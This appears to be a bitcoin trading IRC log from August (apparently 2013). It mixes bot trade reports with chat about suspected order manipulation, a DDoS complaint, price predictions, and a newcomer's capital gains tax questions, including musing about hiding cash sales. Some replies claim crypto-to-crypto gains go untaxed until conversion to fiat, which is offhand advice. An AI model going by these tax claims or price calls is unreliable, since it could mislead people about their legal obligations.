7.74 BTC [+] Aug 18 19:58:36 [HAVELOCK] [HIM] 1 @ 0.1901 BTC [+] Aug 18 19:58:38 [HAVELOCK] [HIM] 45 @ 0.19 = 8.55 BTC [-] Aug 18 20:02:07 [BTCTC] [DMS.SELLING] 1 @ 0.01781 BTC [-] Aug 18 20:03:00 [BTCTC] [DMS.MINING] 1 @ 0.0034 BTC [-] Aug 18 20:03:33 [BTCTC] [DMS.PURCHASE] 1 @ 0.0207 BTC [-] Aug 18 20:03:51 [BTCTC] [DMS.MINING] 2 @ 0.003479 = 0.007 BTC [+] Aug 18 20:05:59 [BTCTC] [DMS.MINING] 1 @ 0.003479 BTC [+] Aug 18 20:07:30 .d Aug 18 20:07:31 50810339.04828 | Next Diff in 1149 blocks | Estimated Change: 21.6506% in 6d 5h 50m 51s Aug 18 20:11:12 [BTCTC] [LABCOIN] 15 @ 0.001683 = 0.0252 BTC [-] Aug 18 20:12:04 [BTCTC] [DMS.MINING] 31 @ 0.0034 = 0.1054 BTC [-] Aug 18 20:12:06 [BTCTC] [DMS.MINING] 2 @ 0.003301 = 0.0066 BTC [-] Aug 18 20:12:07 [BTCTC] [DMS.MINING] 28 @ 0.0033 = 0.0924 BTC [-] Aug 18 20:13:36 [BTCTC] [DMS.MINING] 12 @ 0.00327 = 0.0392 BTC [-] Aug 18 20:13:38 [BTCTC] [DMS.MINING] 1 @ 0.003266 BTC [-] Aug 18 20:13:39 [BTCTC] [DMS.MINING] 111 @ 0.003265 = 0.3624 BTC [-] Aug 18 20:13:40 [BTCTC] [DMS.MINING] 1 @ 0.003261 BTC [-] Aug 18 20:14:45 how about a script that would keep tabs on the amount of sells vs. buys in a day Aug 18 20:15:18 both in individual transaction terms regardless of btc amount, and in btc amount Aug 18 20:15:59 but always regardless of what security.. Aug 18 20:16:10 just run grep on the logs Aug 18 20:16:11 jesus Aug 18 20:16:17 jesus FUCK Aug 18 20:16:29 no bitch Aug 18 20:16:40 i want a fucking script that does that for me Aug 18 20:17:27 write it then Aug 18 20:17:36 ^^^exactly Aug 18 20:17:54 and I thought I was fucking lazy Aug 18 20:17:55 jesus Aug 18 20:18:07 how would you distinguish buys and sells anyway Aug 18 20:18:13 i'm too fucking old for that shit, i'm busy drinking beer Aug 18 20:18:21 i wan YOU to do it for me Aug 18 20:18:33 and then thank me for the pleasure of pleasing me Aug 18 20:18:35 got it? Aug 18 20:18:48 mircea_popescu: that's an execellent question, and I don't think there is an answer. Aug 18 20:19:14 gezuz the amount of spam coming out iof china Aug 18 20:19:19 well the same way you do [+] and [-] Aug 18 20:19:26 bid and asks filled Aug 18 20:19:37 not quite the same thing. Aug 18 20:19:41 i know Aug 18 20:20:01 i didn't mean for the script to be the ultimate harbinger of global trade flows Aug 18 20:20:10 just something fun to watch Aug 18 20:20:32 if that's it just go to camwhores.com Aug 18 20:20:33 or w/ Aug 18 20:20:34 n/m Aug 18 20:20:35 e it is Aug 18 20:20:35 btct provides the info. not sure about others Aug 18 20:20:41 this beer is making me aggressive Aug 18 20:20:56 just wanted to take it out on you huys :) Aug 18 20:21:00 guys* Aug 18 20:21:12 huy is a russian cussword ftr. Aug 18 20:23:49 well i'm gonna have a fag Aug 18 20:23:57 which is brittish for cigarrette Aug 18 20:24:34 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 18 20:25:41 You puff Aug 18 20:27:59 [BTCTC] [ACTIVEMINING] 10 @ 0.005519 = 0.0552 BTC [-] Aug 18 20:30:43 [BTCTC] [ACTIVEMINING] 20 @ 0.00551 = 0.1102 BTC [-] Aug 18 20:30:45 [BTCTC] [ACTIVEMINING] 10 @ 0.00552 = 0.0552 BTC [+] Aug 18 20:30:46 [BTCTC] [ACTIVEMINING] 30 @ 0.00553 = 0.1659 BTC [+] Aug 18 20:30:47 [BTCTC] [ACTIVEMINING] 10 @ 0.005534 = 0.0553 BTC [+] Aug 18 20:30:48 [BTCTC] [ACTIVEMINING] 200 @ 0.005622 = 1.1244 BTC [+] Aug 18 20:30:49 [BTCTC] [ACTIVEMINING] 973 @ 0.005623 = 5.4712 BTC [+] Aug 18 20:30:49 [BTCTC] [ACTIVEMINING] 507 @ 0.005625 = 2.8519 BTC [+] Aug 18 20:40:47 [BTCTC] [ACTIVEMINING] 1 @ 0.00562 BTC [-] Aug 18 20:43:08 [BTCTC] [DMS.PURCHASE] 1 @ 0.0207 BTC [-] Aug 18 20:44:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005464 = 0.1639 BTC [-] Aug 18 20:44:20 [BTCTC] [ACTIVEMINING] 28 @ 0.005463 = 0.153 BTC [-] Aug 18 20:44:22 [BTCTC] [ACTIVEMINING] 10 @ 0.005453 = 0.0545 BTC [-] Aug 18 20:44:23 [BTCTC] [ACTIVEMINING] 100 @ 0.00545 = 0.545 BTC [-] Aug 18 20:45:16 [BTCTC] [NASTY-PT] 2 @ 0.003896 = 0.0078 BTC [+] Aug 18 20:45:30 [BTCTC] [ACTIVEMINING] 30 @ 0.005449 = 0.1635 BTC [-] Aug 18 20:46:25 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 18 20:46:26 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001198 = 0.0036 BTC [+] Aug 18 20:46:50 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 18 20:47:22 [HAVELOCK] [LABCO] 10 @ 0.00179 = 0.0179 BTC [+] Aug 18 20:47:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 18 20:48:21 [BTCTC] [ACTIVEMINING] 15 @ 0.005399 = 0.081 BTC [-] Aug 18 20:48:43 [BTCTC] [ACTIVEMINING] 6 @ 0.005399 = 0.0324 BTC [-] Aug 18 20:50:06 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:50:31 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:50:50 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:51:12 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:51:26 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:51:28 [HAVELOCK] [SDSTM] 5 @ 0.00623 = 0.0312 BTC [+] Aug 18 20:51:31 [BTCTC] [ACTIVEMINING] 16 @ 0.005621 = 0.0899 BTC [+] Aug 18 20:51:41 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [-] Aug 18 20:52:50 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 18 20:53:05 [BTCTC] [ACTIVEMINING] 50 @ 0.005398 = 0.2699 BTC [-] Aug 18 20:53:30 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 20:53:58 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 20:53:59 someone is manipulating actm :p Aug 18 20:54:10 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 20:54:22 30 shares at a time Aug 18 20:54:25 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 20:55:09 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:55:26 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:55:32 wtf Aug 18 20:55:56 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:56:14 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:56:19 thankfully I ignore assbot lines with activemining in it Aug 18 20:56:20 [HAVELOCK] [SDSTM] 5 @ 0.00623 = 0.0312 BTC [+] Aug 18 20:56:26 a bot or somone playing against a bot? Aug 18 20:56:32 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 20:56:32 that's pretty advanced ignoribng Aug 18 20:56:42 [HAVELOCK] [LABCO] 20 @ 0.001798 = 0.036 BTC [+] Aug 18 20:56:44 [HAVELOCK] [LABCO] 180 @ 0.001799 = 0.3238 BTC [+] Aug 18 20:57:00 it used to be 25 shares ask and bid Aug 18 20:57:10 now it seems it's 30 Aug 18 20:58:27 [BTCTC] [ACTIVEMINING] 30 @ 0.005389 = 0.1617 BTC [-] Aug 18 20:58:49 yea.. 30 bid + ask Aug 18 20:58:51 [BTCTC] [ACTIVEMINING] 30 @ 0.005389 = 0.1617 BTC [-] Aug 18 20:58:59 on and on and on Aug 18 20:59:09 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001198 BTC [+] Aug 18 20:59:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005389 = 0.1617 BTC [-] Aug 18 20:59:38 [BTCTC] [ACTIVEMINING] 30 @ 0.005389 = 0.1617 BTC [-] Aug 18 20:59:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005389 = 0.1617 BTC [-] Aug 18 21:00:20 [BTCTC] [ACTIVEMINING] 6 @ 0.005389 = 0.0323 BTC [-] Aug 18 21:01:31 [BTCTC] [ACTIVEMINING] 30 @ 0.005521 = 0.1656 BTC [+] Aug 18 21:01:44 [BTCTC] [ACTIVEMINING] 30 @ 0.005521 = 0.1656 BTC [+] Aug 18 21:02:02 [BTCTC] [ACTIVEMINING] 30 @ 0.005521 = 0.1656 BTC [+] Aug 18 21:02:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005521 = 0.1656 BTC [+] Aug 18 21:02:29 [BTCTC] [ACTIVEMINING] 30 @ 0.005521 = 0.1656 BTC [+] Aug 18 21:02:31 [HAVELOCK] [AM100] 1 @ 0.0375 BTC [+] Aug 18 21:02:41 getting ridiculous.. Aug 18 21:03:28 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:03:48 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:04:06 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:04:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:04:34 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:04:48 [BTCTC] [ACTIVEMINING] 6 @ 0.005379 = 0.0323 BTC [-] Aug 18 21:04:49 [BTCTC] [ACTIVEMINING] 44 @ 0.00538 = 0.2367 BTC [+] Aug 18 21:05:36 [BTCTC] [TAT.ASICMINER] 9 @ 0.0374 = 0.3366 BTC [+] Aug 18 21:05:38 [BTCTC] [ACTIVEMINING] 30 @ 0.005526 = 0.1658 BTC [+] Aug 18 21:06:01 [BTCTC] [ACTIVEMINING] 30 @ 0.005526 = 0.1658 BTC [+] Aug 18 21:06:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005526 = 0.1658 BTC [+] Aug 18 21:06:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005526 = 0.1658 BTC [+] Aug 18 21:06:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.03814 BTC [+] Aug 18 21:06:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.03814 = 0.0763 BTC [+] Aug 18 21:06:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005526 = 0.1658 BTC [+] Aug 18 21:07:49 is anyone trading on mpex anymore? Aug 18 21:08:09 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:08:14 also Aug 18 21:08:20 ;;premium mtgox bitstamp Aug 18 21:08:22 mtgox premium over bitstamp is currently 13.640327926 %. Aug 18 21:08:24 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:08:38 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:08:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:09:08 [BTCTC] [ACTIVEMINING] 30 @ 0.005379 = 0.1614 BTC [-] Aug 18 21:12:10 [BTCTC] [TAT.ASICMINER] 12 @ 0.03813 = 0.4576 BTC [-] Aug 18 21:12:56 [BTCTC] [BTC-BOND] 2 @ 0.0099 = 0.0198 BTC [-] Aug 18 21:13:18 [HAVELOCK] [AM100] 1 @ 0.0373999 BTC [-] Aug 18 21:19:41 Activemining hitting 0.007 today Aug 18 21:20:48 [BTCTC] [DMS.MINING] 5 @ 0.003478 = 0.0174 BTC [+] Aug 18 21:22:15 ;;premium mtgox bitstamp Aug 18 21:22:17 mtgox premium over bitstamp is currently 13.1403508772 %. Aug 18 21:31:05 are you guys bothering/dealing with capital gain tax? it is risky try to not to? let's say I decide to sell my bitcoin face to face instead Aug 18 21:31:50 You still gotta pay tax on it Aug 18 21:32:10 You can say what you want but when you flip your btc to fiat Aug 18 21:32:15 you best be paying tax Aug 18 21:32:28 or you're gambling with the irs Aug 18 21:32:33 pay your taxes, failing to do that will just make regulation even more invasive Aug 18 21:32:41 true true Aug 18 21:32:55 Just keep a detailed record of your cost basis Aug 18 21:33:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 21:33:52 so for simplicity, lets say I wired 5k to mtgox, bought bitcoins, transfered that to btct, trippled my investment.. is it enough to play capital gain tax on that 10k I gained or do I need to do it on a per trade kind of thing? Aug 18 21:33:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 18 21:34:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 18 21:34:38 everytime you convert to fiat Aug 18 21:34:43 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 18 21:34:55 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 18 21:35:09 You have to pay short term capital gains tax on the 10K if you now have 15K in cash Aug 18 21:35:15 if its all still in crypto Aug 18 21:35:19 you havent realized the gain Aug 18 21:35:35 so you dont have to pay tax until to convert it to fiat then Aug 18 21:35:44 You havent technically made anything Aug 18 21:35:47 same with other asset Aug 18 21:36:09 if you buy a stock at 1$ and it goes to 5$ Aug 18 21:36:14 you dont pay tax till you sell it Aug 18 21:36:19 makes sense Aug 18 21:37:09 IF you've made sizable amounts you're better off gettting an accountant to do the taxes for you for this Aug 18 21:37:25 so, is it correct that I dont need to worry too much about the inidivudal day trading Ive been doing and can just group it to one thing, i.e, bought 5k worth of bitcoins and then later sold 15k worth of bitcoin, capital gain is 10k Aug 18 21:37:43 depends if youre flipping in and out of cash Aug 18 21:37:44 yeah for sure, Im thinking about doing that... I dont want to risk screwing it up since I never had to deal with it before Aug 18 21:37:50 not flipping in and out cash Aug 18 21:37:50 [BTCTC] [DMS.MINING] 1 @ 0.003478 BTC [+] Aug 18 21:37:54 then youre fine Aug 18 21:38:04 awesome Aug 18 21:38:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 21:38:31 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 21:38:34 thank you for clarifying that Aug 18 21:38:56 No worries. Like i said though its worth it to get an accountant Aug 18 21:38:56 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 21:39:11 Also keep an eye on the legislature because they may change the reporting in the near future Aug 18 21:39:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 21:39:37 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 21:39:50 Karsy who are you ? Aug 18 21:40:24 bobbabad_ for simplicity sake the best move is to consult a tax specialist Aug 18 21:40:33 we don't know where you live, what your code says etc. Aug 18 21:40:34 matuszed make sense.. would be nice if I can find a good accountant that understand a bit of in and out of bitcoin Aug 18 21:40:55 mircea_popescu, makes sense.. Im in Canada, but Im gonna start looking for something like that Aug 18 21:41:02 you should. Aug 18 21:41:04 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 18 21:41:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 18 21:41:35 i mean if you suddenly felt ill you wouldn't be asking random people in the street what they thought you should take Aug 18 21:41:41 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 18 21:41:57 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 18 21:42:11 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 18 21:44:04 [BTCTC] [ACTIVEMINING] 30 @ 0.005404 = 0.1621 BTC [-] Aug 18 21:44:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005404 = 0.1621 BTC [-] Aug 18 21:44:24 with bitcoin it just seems so easy to cheat the system.. it being an unregulated as it is Aug 18 21:44:26 [BTCTC] [ACTIVEMINING] 30 @ 0.005403 = 0.1621 BTC [-] Aug 18 21:44:41 [BTCTC] [ACTIVEMINING] 30 @ 0.005404 = 0.1621 BTC [+] Aug 18 21:44:56 [BTCTC] [ACTIVEMINING] 30 @ 0.005404 = 0.1621 BTC [+] Aug 18 21:45:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:45:50 I mean sure, I wired money to the currency exchange so that transaction is recorded in my bank.. But other then that, if I were to sell bitcoins in cash (not saying I plan to) then how could the IRS or eq find out Aug 18 21:45:50 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:46:03 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:46:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:46:25 I mean if you sold youre computer for cash the irs or eq wouldnt find out either Aug 18 21:46:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:46:42 At least in the US and I assume Canada the burden is on the taxpayer to report Aug 18 21:46:51 right but cash doesn't have a ledge of everytransaction built into each dollar Aug 18 21:46:56 ledger Aug 18 21:47:12 True Aug 18 21:47:25 matuszed, sure but I wont make a capital gain selling a computer or a car most likely Aug 18 21:47:27 Just pay your taxes people its good for Bitcoin in the en Aug 18 21:47:42 for sure.. I will, its not worth the gamble for me not to Aug 18 21:47:52 Yea most items depreciate but collectible stuff does Aug 18 21:48:06 but I find it interesting to know what other people are doing, and with the face to face market of selling and buying bitcoins seems to be increasing Aug 18 21:51:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 18 21:51:21 http://trilema.com/2013/the-theory-behind-the-alternative-eve-corporation/ Aug 18 21:51:25 The theory behind the alternative EVE corporation pe Trilema - Un blog de Mircea Popescu. Aug 18 21:51:27 if anyone feels like a long read. Aug 18 21:51:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.03775 BTC [-] Aug 18 21:51:49 [BTCTC] [DMS.PURCHASE] 20 @ 0.0207 = 0.414 BTC [-] Aug 18 21:51:52 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 18 21:52:01 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 18 21:52:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 18 21:52:42 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 18 21:53:02 [BTCTC] [LABCOIN] 232 @ 0.001686 = 0.3912 BTC [+] Aug 18 21:53:34 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:53:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:54:00 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:54:13 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:54:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005536 = 0.1661 BTC [+] Aug 18 21:58:52 [BTCTC] [ACTIVEMINING] 30 @ 0.005394 = 0.1618 BTC [-] Aug 18 21:59:04 [BTCTC] [ACTIVEMINING] 30 @ 0.005394 = 0.1618 BTC [-] Aug 18 21:59:17 [BTCTC] [DMS.MINING] 140 @ 0.003479 = 0.4871 BTC [+] Aug 18 21:59:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005394 = 0.1618 BTC [-] Aug 18 21:59:32 [BTCTC] [ACTIVEMINING] 30 @ 0.005394 = 0.1618 BTC [-] Aug 18 21:59:56 [BTCTC] [ACTIVEMINING] 30 @ 0.005394 = 0.1618 BTC [-] Aug 18 22:00:36 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 22:00:50 [HAVELOCK] [XBOND] 8 @ 0.00117899 = 0.0094 BTC [-] Aug 18 22:01:00 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 22:01:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 22:01:31 [HAVELOCK] [LABCO] 200 @ 0.001799 = 0.3598 BTC [+] Aug 18 22:01:36 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 22:02:05 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 22:05:40 did i say ridiculous? Aug 18 22:06:10 i'm sorry Aug 18 22:09:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.03709 BTC [-] Aug 18 22:09:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.03706 BTC [-] Aug 18 22:09:07 [BTCTC] [TAT.ASICMINER] 11 @ 0.03705 = 0.4076 BTC [-] Aug 18 22:09:33 you meant ridicurous ? Aug 18 22:12:27 aand btct down Aug 18 22:12:48 someone is doing something Aug 18 22:12:52 that's for sure Aug 18 22:12:58 [BTCTC] [COGNITIVE] 6 @ 0.391 = 2.346 BTC [+] Aug 18 22:12:59 [BTCTC] [COGNITIVE] 2 @ 0.3921 = 0.7842 BTC [+] Aug 18 22:13:00 [BTCTC] [COGNITIVE] 5 @ 0.3922 = 1.961 BTC [+] Aug 18 22:13:01 [BTCTC] [COGNITIVE] 2 @ 0.395 = 0.79 BTC [+] Aug 18 22:13:31 [BTCTC] [DMS.SELLING] 1 @ 0.01781 BTC [-] Aug 18 22:13:50 no it's not Aug 18 22:14:08 [BTCTC] [DMS.SELLING] 10 @ 0.01782 = 0.1782 BTC [+] Aug 18 22:14:09 [BTCTC] [DMS.SELLING] 85 @ 0.01782 = 1.5147 BTC [+] Aug 18 22:14:34 [BTCTC] [LABCOIN] 500 @ 0.001686 = 0.843 BTC [+] Aug 18 22:15:37 [BTCTC] [DMS.MINING] 1 @ 0.0034 BTC [-] Aug 18 22:16:06 [BTCTC] [DMS.PURCHASE] 1 @ 0.0207 BTC [-] Aug 18 22:16:19 [BTCTC] [DMS.SELLING] 10 @ 0.01782 = 0.1782 BTC [+] Aug 18 22:16:20 [BTCTC] [DMS.SELLING] 4 @ 0.01783 = 0.0713 BTC [+] Aug 18 22:18:15 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001198 = 0.0048 BTC [+] Aug 18 22:21:30 [BTCTC] [TAT.VIRTUALMINE] 52 @ 0.001198 = 0.0623 BTC [+] Aug 18 22:22:01 [BTCTC] [DMS.SELLING] 2 @ 0.01782 = 0.0356 BTC [-] Aug 18 22:23:29 ;;nethash Aug 18 22:23:30 481952.961709 Aug 18 22:23:34 .d Aug 18 22:23:35 50810339.04828 | Next Diff in 1129 blocks | Estimated Change: 21.9811% in 6d 2h 45m 26s Aug 18 22:29:55 [HAVELOCK] [AM100] 2 @ 0.0372 = 0.0744 BTC [-] Aug 18 22:33:11 [BTCTC] [DMS.SELLING] 2 @ 0.01782 = 0.0356 BTC [-] Aug 18 22:33:37 [BTCTC] [DMS.SELLING] 2 @ 0.01783 = 0.0357 BTC [+] Aug 18 22:33:51 [BTCTC] [BTC-GROWTH] 6 @ 0.1018 = 0.6108 BTC [+] Aug 18 22:36:56 [HAVELOCK] [XBOND] 16 @ 0.00117899 = 0.0189 BTC [-] Aug 18 22:37:36 [HAVELOCK] [XBOND] 3 @ 0.00117899 = 0.0035 BTC [-] Aug 18 22:38:15 [HAVELOCK] [XBOND] 46 @ 0.00117899 = 0.0542 BTC [-] Aug 18 22:38:19 i'm being ddossed Aug 18 22:38:31 someone from here prolly Aug 18 22:39:32 [HAVELOCK] [XBOND] 81 @ 0.00117899 = 0.0955 BTC [-] Aug 18 22:39:54 this is bizarre Aug 18 22:40:23 gox looks like its breaking out upwards, bitstamp almost like its gonna go down Aug 18 22:40:40 [BTCTC] [BASIC-MINING] 3 @ 0.308 = 0.924 BTC [-] Aug 18 22:40:49 ;;ticker Aug 18 22:40:50 MtGox BTCUSD ticker | Best bid: 113.81004, Best ask: 114.11994, Bid-ask spread: 0.30990, Last trade: 114.11995, 24 hour volume: 10251.28270363, 24 hour low: 112.00000, 24 hour high: 114.69000, 24 hour vwap: 113.62291 Aug 18 22:41:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.03756 = 0.1127 BTC [+] Aug 18 22:43:21 nothing bizarre about it. it's the only way to get usd out of mtgox Aug 18 22:43:32 [BTCTC] [LABCOIN] 42 @ 0.001686 = 0.0708 BTC [+] Aug 18 22:44:13 yea but the discrepancy hasn't been this strong, especially if one ends up breaking out above and the other below Aug 18 22:44:25 but that has yet to happen Aug 18 22:45:02 it's been 10% apart or so. Aug 18 22:45:03 [HAVELOCK] [AM100] 1 @ 0.0372 BTC [-] Aug 18 22:45:15 mtgox is poop Aug 18 22:46:17 [BTCTC] [LABCOIN] 172 @ 0.001686 = 0.29 BTC [+] Aug 18 22:47:19 [BTCTC] [LABCOIN] 5000 @ 0.001687 = 8.435 BTC [+] Aug 18 22:48:19 i think if 113+ can be sustained for the next day or so we'll see bitstamp/campbx come up to 105ish Aug 18 22:48:53 ;;ticker Aug 18 22:48:54 MtGox BTCUSD ticker | Best bid: 113.37502, Best ask: 113.81005, Bid-ask spread: 0.43503, Last trade: 114.12000, 24 hour volume: 10340.07157438, 24 hour low: 112.00000, 24 hour high: 114.69000, 24 hour vwap: 113.62210 Aug 18 22:49:15 [BTCTC] [BASIC-MINING] 1 @ 0.308 BTC [-] Aug 18 22:49:16 [BTCTC] [BASIC-MINING] 1 @ 0.308 BTC [-] Aug 18 22:49:17 [BTCTC] [BASIC-MINING] 1 @ 0.3089 BTC [+] Aug 18 22:49:32 [BTCTC] [BASIC-MINING] 3 @ 0.309 = 0.927 BTC [+] Aug 18 22:49:32 dude what the hell is going on with XBOND Aug 18 22:49:34 this is absurd Aug 18 22:49:44 [HAVELOCK] [AM100] 3 @ 0.0366 = 0.1098 BTC [-] Aug 18 22:49:54 [HAVELOCK] [AM100] 3 @ 0.0366 = 0.1098 BTC [-] Aug 18 22:51:11 Duffer1 if they do come to 105ish it'd be likely unrelated. Aug 18 22:51:12 someone is manipulating btct and ddossing ppl Aug 18 22:51:18 that's what's going on Aug 18 22:51:26 XBOND isn't on BTCTC Aug 18 22:51:34 [BTCTC] [DMS.PURCHASE] 73 @ 0.0207 = 1.5111 BTC [-] Aug 18 22:51:46 o right Aug 18 22:52:05 well i'm being dossed like a motherfucker Aug 18 22:52:31 [BTCTC] [ACTIVEMINING] 68 @ 0.005422 = 0.3687 BTC [-] Aug 18 22:52:33 Gox is a good indicator of where the market wants to go though Aug 18 22:52:34 [BTCTC] [ACTIVEMINING] 30 @ 0.005426 = 0.1628 BTC [+] Aug 18 22:52:42 even on other exchanges Aug 18 22:52:48 [BTCTC] [ACTIVEMINING] 3 @ 0.005327 = 0.016 BTC [-] Aug 18 22:54:12 imo Aug 18 22:54:15 btc breaks 135 then it's going to test 260 Aug 18 22:54:26 [HAVELOCK] [XBOND] 3 @ 0.0011789 = 0.0035 BTC [-] Aug 18 22:54:28 but that's still far off Aug 18 22:54:33 that would be hot :P Aug 18 22:55:03 if it breaks 260 it's going to 1K Aug 18 22:55:07 immediately Aug 18 22:55:52 if $random then $random Aug 18 22:56:06 hehe Aug 18 22:56:24 no Aug 18 22:56:36 if >260 then 1K Aug 18 22:56:38 :p Aug 18 22:57:55 anyways.. Aug 18 22:57:59 nite Aug 18 22:59:34 [BTCTC] [BTC-GROWTH] 57 @ 0.1004 = 5.7228 BTC [-] Aug 18 22:59:58 [BTCTC] [BTC-GROWTH] 18 @ 0.1003 = 1.8054 BTC [-] Aug 18 23:00:00 [BTCTC] [BTC-GROWTH] 95 @ 0.1003 = 9.5285 BTC [-] Aug 18 23:00:03 sry mircea_popescu, stupid comment by me, but looking at the charts and accounting for mass psychology Aug 18 23:00:20 i'd say there is nothing between 260 and 1000 Aug 18 23:00:59 i think it wants to go there, but the sell pressure would be enormous Aug 18 23:01:19 nobody is gonna sell at 500 Aug 18 23:01:34 that's not how the human psyche works Aug 18 23:01:36 i'd sell at 8 hehe Aug 18 23:03:46 after 800, there would be some back and forth, ending with a spike to 1000 Aug 18 23:03:54 then settling arounf 700-800 Aug 18 23:03:58 around* Aug 18 23:04:24 something like that Aug 18 23:04:32 [MPEX] [S.MPOE] 5831 @ 0.00084218 = 4.9108 BTC [+] Aug 18 23:04:33 